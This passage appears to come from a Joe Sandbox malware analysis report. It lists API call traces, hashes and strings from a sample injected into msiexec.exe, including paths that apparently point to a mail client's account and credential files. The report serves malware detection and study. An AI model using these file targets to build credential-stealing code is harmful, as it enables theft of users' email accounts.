                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1FC789FB
                                                                                                          • __freea.LIBCMT ref: 1FC78A08
                                                                                                            • Part of subcall function 1FC756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1FC75702
                                                                                                          • __freea.LIBCMT ref: 1FC78A11
                                                                                                          • __freea.LIBCMT ref: 1FC78A36
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1414292761-0
                                                                                                          • Opcode ID: acd60fb537bf042697ffabd556288079846dcd7941d7795a94290e8c129aa86d
                                                                                                          • Instruction ID: b7ad79228b6d52d345d01e372a367691f7b28e2664760eecac87ce0030e25c87
                                                                                                          • Opcode Fuzzy Hash: acd60fb537bf042697ffabd556288079846dcd7941d7795a94290e8c129aa86d
                                                                                                          • Instruction Fuzzy Hash: F151C273610256ABDB15CE64CC81EAB77AAEB40760F214769FE04DA1C0FF35FC54A6A0

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • _strlen.LIBCMT ref: 1FC71607
                                                                                                          • _strcat.LIBCMT ref: 1FC7161D
                                                                                                          • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1FC7190E,?,?,00000000,?,00000000), ref: 1FC71643
                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,1FC7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1FC7165A
                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,1FC7190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 1FC71661
                                                                                                          • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1FC7190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1FC71686
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1922816806-0
                                                                                                          • Opcode ID: c7f67707d2fd675141a369624d58141db9fe5658de7d993b85a6f0ea6ba6ae06
                                                                                                          • Instruction ID: 8f8e1693d375ccf4ff8049183240ad770c0391a41fa1da050d4c03a727299e17
                                                                                                          • Opcode Fuzzy Hash: c7f67707d2fd675141a369624d58141db9fe5658de7d993b85a6f0ea6ba6ae06
                                                                                                          • Instruction Fuzzy Hash: B421AA37900304ABD704DB55DC84EEE77B9EF88720F24415AE604AB145DF34B545A7A5

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 1FC71038
                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1FC7104B
                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1FC71061
                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 1FC71075
                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 1FC71090
                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 1FC710B8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$AttributesFilelstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 3594823470-0
                                                                                                          • Opcode ID: ff97ac07e170c04e06def28b460a8a037cb50bd69c3f4ae5b5f4b151472501c2
                                                                                                          • Instruction ID: a5a1f7e502d366cf25e631cb952e7ae5e7c4fccf385171ef47474de5bcecfe03
                                                                                                          • Opcode Fuzzy Hash: ff97ac07e170c04e06def28b460a8a037cb50bd69c3f4ae5b5f4b151472501c2
                                                                                                          • Instruction Fuzzy Hash: 292181369003699BCF10DA60DC58EDB376EEF84224F104396E959971A1DE31FA99DF40

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,1FC73518,1FC723F1,1FC71F17), ref: 1FC73864
                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1FC73872
                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1FC7388B
                                                                                                          • SetLastError.KERNEL32(00000000,?,1FC73518,1FC723F1,1FC71F17), ref: 1FC738DD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3852720340-0
                                                                                                          • Opcode ID: 634255f4765535cab66a251f651849ecdd08581a5b587e4d6d6575ea393f1089
                                                                                                          • Instruction ID: ef5102dd5d7a0bf03ec1f07075f803d5ab37f3e193a02f46c8ee7571c15aa72c
                                                                                                          • Opcode Fuzzy Hash: 634255f4765535cab66a251f651849ecdd08581a5b587e4d6d6575ea393f1089
                                                                                                          • Instruction Fuzzy Hash: 9801D4376187279EE702167A6CC79466B94EB49A75B20036FE210991E0EF236819B344
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(?,?,1FC76C6C), ref: 1FC75AFA
                                                                                                          • _free.LIBCMT ref: 1FC75B2D
                                                                                                          • _free.LIBCMT ref: 1FC75B55
                                                                                                          • SetLastError.KERNEL32(00000000,?,?,1FC76C6C), ref: 1FC75B62
                                                                                                          • SetLastError.KERNEL32(00000000,?,?,1FC76C6C), ref: 1FC75B6E
                                                                                                          • _abort.LIBCMT ref: 1FC75B74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                          • String ID:
                                                                                                          • API String ID: 3160817290-0
                                                                                                          • Opcode ID: ed558473a7c9b0b5c73b3d0283dd235a0b319287ac29d14979408321b8476287
                                                                                                          • Instruction ID: c56ab7599fcdec4452b33b1b026d023298baf4d56810abdd5dd522edf53d89fd
                                                                                                          • Opcode Fuzzy Hash: ed558473a7c9b0b5c73b3d0283dd235a0b319287ac29d14979408321b8476287
                                                                                                          • Instruction Fuzzy Hash: CFF0C83B5047D2ABD34212346C84E6F2E69DFF1E71F240B28F914AA190FF25A4167164
                                                                                                          APIs
                                                                                                            • Part of subcall function 1FC71E89: lstrlenW.KERNEL32(?,?,?,?,?,1FC710DF,?,?,?,00000000), ref: 1FC71E9A
                                                                                                            • Part of subcall function 1FC71E89: lstrcatW.KERNEL32(?,?,?,1FC710DF,?,?,?,00000000), ref: 1FC71EAC
                                                                                                            • Part of subcall function 1FC71E89: lstrlenW.KERNEL32(?,?,1FC710DF,?,?,?,00000000), ref: 1FC71EB3
                                                                                                            • Part of subcall function 1FC71E89: lstrlenW.KERNEL32(?,?,1FC710DF,?,?,?,00000000), ref: 1FC71EC8
                                                                                                            • Part of subcall function 1FC71E89: lstrcatW.KERNEL32(?,1FC710DF,?,1FC710DF,?,?,?,00000000), ref: 1FC71ED3
                                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1FC7122A
                                                                                                            • Part of subcall function 1FC7173A: _strlen.LIBCMT ref: 1FC71855
                                                                                                            • Part of subcall function 1FC7173A: _strlen.LIBCMT ref: 1FC71869
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                          • API String ID: 4036392271-1520055953
                                                                                                          • Opcode ID: eff6660b5fa4cf06b9f751b533c949538882c3b0c257c033c1135880ede2611f
                                                                                                          • Instruction ID: 322ecb87b050dd5b862d318ea2bcf05cc0def10af7eb66f7446ac68ae37d1bfa
                                                                                                          • Opcode Fuzzy Hash: eff6660b5fa4cf06b9f751b533c949538882c3b0c257c033c1135880ede2611f
                                                                                                          • Instruction Fuzzy Hash: 682185B9E103586AEB1097A0EC91FED733AEF80714F101656FA04EB1D0EEB17D858759
                                                                                                          APIs
                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,1FC74AEA,?,?,1FC74A8A,?,1FC82238,0000000C,1FC74BBD,00000000,00000000), ref: 1FC74B59
                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 1FC74B6C
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,1FC74AEA,?,?,1FC74A8A,?,1FC82238,0000000C,1FC74BBD,00000000,00000000,00000001,1FC72082), ref: 1FC74B8F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                          • Opcode ID: 45100b071f8bc69aa0927188c5860009d5581b1c441d41c94e9fcb8f8de82779
                                                                                                          • Instruction ID: ca6fbaa71eeede83620c7fcc26745e5ba952354eb108703be44fa24f6a633fa3
                                                                                                          • Opcode Fuzzy Hash: 45100b071f8bc69aa0927188c5860009d5581b1c441d41c94e9fcb8f8de82779
                                                                                                          • Instruction Fuzzy Hash: BAF0AF32900219FFCB019FA1CC58FDDBFB9EF44621F0043A4F906A6250DF31A951EA90
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 1FC7715C
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1FC7717F
                                                                                                            • Part of subcall function 1FC756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1FC75702
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 1FC771A5
                                                                                                          • _free.LIBCMT ref: 1FC771B8
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 1FC771C7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 336800556-0
                                                                                                          • Opcode ID: ee4d42b384bf1459f28498df852b2313e103d86f3bcec511201968958d0faf97
                                                                                                          • Instruction ID: 6bf39905b9d934362766812bdcca1e4b7a471f994c7f09ba9387d1f8cda06991
                                                                                                          • Opcode Fuzzy Hash: ee4d42b384bf1459f28498df852b2313e103d86f3bcec511201968958d0faf97
                                                                                                          • Instruction Fuzzy Hash: 6D01A77760136A7F67111AB64C8CDBB6A6DDEC2FA0311036DFD08D7200EE61AC02A2B1
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,1FC7636D,1FC75713,00000000,?,1FC72249,?,?,1FC71D66,00000000,?,?,00000000), ref: 1FC75B7F
                                                                                                          • _free.LIBCMT ref: 1FC75BB4
                                                                                                          • _free.LIBCMT ref: 1FC75BDB
                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC75BE8
                                                                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1FC75BF1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3170660625-0
                                                                                                          • Opcode ID: f9465e6f8fb41dbb7bfa05de474d61f272ffe3e0caa982f5d0db0ec091b19be6
                                                                                                          • Instruction ID: d8189738bfe57025d8c7cb98a95f29cba27d57bb761990d48caa0e4740f636bf
                                                                                                          • Opcode Fuzzy Hash: f9465e6f8fb41dbb7bfa05de474d61f272ffe3e0caa982f5d0db0ec091b19be6
                                                                                                          • Instruction Fuzzy Hash: 2101287B1047D3A7D30216351CC4D2F2E6D9BE1A74B200B68F915AA290EF26F8067160
                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,1FC710DF,?,?,?,00000000), ref: 1FC71E9A
                                                                                                          • lstrcatW.KERNEL32(?,?,?,1FC710DF,?,?,?,00000000), ref: 1FC71EAC
                                                                                                          • lstrlenW.KERNEL32(?,?,1FC710DF,?,?,?,00000000), ref: 1FC71EB3
                                                                                                          • lstrlenW.KERNEL32(?,?,1FC710DF,?,?,?,00000000), ref: 1FC71EC8
                                                                                                          • lstrcatW.KERNEL32(?,1FC710DF,?,1FC710DF,?,?,?,00000000), ref: 1FC71ED3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$lstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 493641738-0
                                                                                                          • Opcode ID: cd802e9c0f9edeb1f232748ca9a06bb1c8a0b81f2b7b337aacd692355129323f
                                                                                                          • Instruction ID: 2d11708454c888b20afb0944d903a1942e3ce44d759e365f1f1c7a5e0401214a
                                                                                                          • Opcode Fuzzy Hash: cd802e9c0f9edeb1f232748ca9a06bb1c8a0b81f2b7b337aacd692355129323f
                                                                                                          • Instruction Fuzzy Hash: E2F089271002207AE7212729ACC5EBF7B7CFFC5A70F040219F60893190AF557852A6B5
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 1FC791D0
                                                                                                            • Part of subcall function 1FC7571E: HeapFree.KERNEL32(00000000,00000000,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?), ref: 1FC75734
                                                                                                            • Part of subcall function 1FC7571E: GetLastError.KERNEL32(?,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?,?), ref: 1FC75746
                                                                                                          • _free.LIBCMT ref: 1FC791E2
                                                                                                          • _free.LIBCMT ref: 1FC791F4
                                                                                                          • _free.LIBCMT ref: 1FC79206
                                                                                                          • _free.LIBCMT ref: 1FC79218
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: 8921a079429d4be7208b3110ab86d71156adb5abde84766786ef9bf4d21b73be
                                                                                                          • Instruction ID: 01b674978eccbfb48a29d5b88b5b483fe885f031d1a25c3c65010df7e1c179f1
                                                                                                          • Opcode Fuzzy Hash: 8921a079429d4be7208b3110ab86d71156adb5abde84766786ef9bf4d21b73be
                                                                                                          • Instruction Fuzzy Hash: 3BF09672524390E7C611DB58D6C5C867BE9FA807A03505D49F90AD7A10DF35F890AA50
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 1FC7536F
                                                                                                            • Part of subcall function 1FC7571E: HeapFree.KERNEL32(00000000,00000000,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?), ref: 1FC75734
                                                                                                            • Part of subcall function 1FC7571E: GetLastError.KERNEL32(?,?,1FC7924F,?,00000000,?,00000000,?,1FC79276,?,00000007,?,?,1FC77E5A,?,?), ref: 1FC75746
                                                                                                          • _free.LIBCMT ref: 1FC75381
                                                                                                          • _free.LIBCMT ref: 1FC75394
                                                                                                          • _free.LIBCMT ref: 1FC753A5
                                                                                                          • _free.LIBCMT ref: 1FC753B6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 776569668-0
                                                                                                          • Opcode ID: 63fffbb6d0256b17b0c3bc438b037a4b9340580ce7a9b6b2c43ea11fd1f0d42d
                                                                                                          • Instruction ID: b0ffd0062f0cc9ee4d7be0c3c6dad73b041bc0340cd199d8427dbc7ad845b99e
                                                                                                          • Opcode Fuzzy Hash: 63fffbb6d0256b17b0c3bc438b037a4b9340580ce7a9b6b2c43ea11fd1f0d42d
                                                                                                          • Instruction Fuzzy Hash: 4DF0B7758252B6EBC6039F2499C44087FA1ABA5E743011ACEEA1097370DF325866BBC0
                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 1FC74C1D
                                                                                                          • _free.LIBCMT ref: 1FC74CE8
                                                                                                          • _free.LIBCMT ref: 1FC74CF2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$FileModuleName
                                                                                                          • String ID: C:\Windows\System32\msiexec.exe
                                                                                                          • API String ID: 2506810119-1382325751
                                                                                                          • Opcode ID: 337c21fccecfedcef91c4878ec39e7eb5c30abccce1e30e3f2fdee985a94326d
                                                                                                          • Instruction ID: 8e6ca4d3f97d72447856496ab14f938a49d8a991c8f5aecfbca2c568ee6acdc5
                                                                                                          • Opcode Fuzzy Hash: 337c21fccecfedcef91c4878ec39e7eb5c30abccce1e30e3f2fdee985a94326d
                                                                                                          • Instruction Fuzzy Hash: F0316276A00359EFDB12CFA9C98499EFBFCEB85710B104297E90497310DF71AA45EB90
                                                                                                          APIs
                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,1FC76FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 1FC78731
                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1FC787BA
                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1FC787CC
                                                                                                          • __freea.LIBCMT ref: 1FC787D5
                                                                                                            • Part of subcall function 1FC756D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1FC75702
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                          • String ID:
                                                                                                          • API String ID: 2652629310-0
                                                                                                          • Opcode ID: 544a6a65ebf8ea88ae79b2630935251f1867807c512c288380457bc74544501a
                                                                                                          • Instruction ID: f29b36820328d2bbaf10a67e1f0f2437ef3cf4c11d1e54760d03eb943eaab9dd
                                                                                                          • Opcode Fuzzy Hash: 544a6a65ebf8ea88ae79b2630935251f1867807c512c288380457bc74544501a
                                                                                                          • Instruction Fuzzy Hash: F331A036A0021AABDF15CF65CC81DEF7BA5EB40620F114368FE05D6190EB35E955EBA0
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(1FC7C7DD), ref: 1FC7C7E6
                                                                                                          • GetModuleHandleA.KERNEL32(?,1FC7C7DD), ref: 1FC7C838
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 1FC7C860
                                                                                                            • Part of subcall function 1FC7C803: GetProcAddress.KERNEL32(00000000,1FC7C7F4), ref: 1FC7C804
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1646373207-0
                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                          • Instruction ID: 5f4086e1317f80b407b5cc90918ae96cd0e00a5a98c54767182a4246f5333e45
                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                          • Instruction Fuzzy Hash: 8001F532945F437CAB11D6B44C01AFADF989A17660B101756E150D7193EEA0E50EF3F6
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,1FC71D66,00000000,00000000,?,1FC75C88,1FC71D66,00000000,00000000,00000000,?,1FC75E85,00000006,FlsSetValue), ref: 1FC75D13
                                                                                                          • GetLastError.KERNEL32(?,1FC75C88,1FC71D66,00000000,00000000,00000000,?,1FC75E85,00000006,FlsSetValue,1FC7E190,FlsSetValue,00000000,00000364,?,1FC75BC8), ref: 1FC75D1F
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,1FC75C88,1FC71D66,00000000,00000000,00000000,?,1FC75E85,00000006,FlsSetValue,1FC7E190,FlsSetValue,00000000), ref: 1FC75D2D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3177248105-0
                                                                                                          • Opcode ID: 8443c43e0d45a3d078734aeb60620c72be823ea9eaafb7846bc8fc8e0ae2cbc8
                                                                                                          • Instruction ID: e62fa2cef6d8150b1af87d2a2779e3cb710aa9ed91239693fa15c61ba6017326
                                                                                                          • Opcode Fuzzy Hash: 8443c43e0d45a3d078734aeb60620c72be823ea9eaafb7846bc8fc8e0ae2cbc8
                                                                                                          • Instruction Fuzzy Hash: 4101F7376092B3ABC7154A798C8CA463798AFA5BB1B110F60FA09DB140DB21E811DAE0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _strlen
                                                                                                          • String ID: : $Se.
                                                                                                          • API String ID: 4218353326-4089948878
                                                                                                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                          • Instruction ID: 553b866b15be847e1dc3d9bf35209ab02023ce172e6d60eadbe159b6f55f9760
                                                                                                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
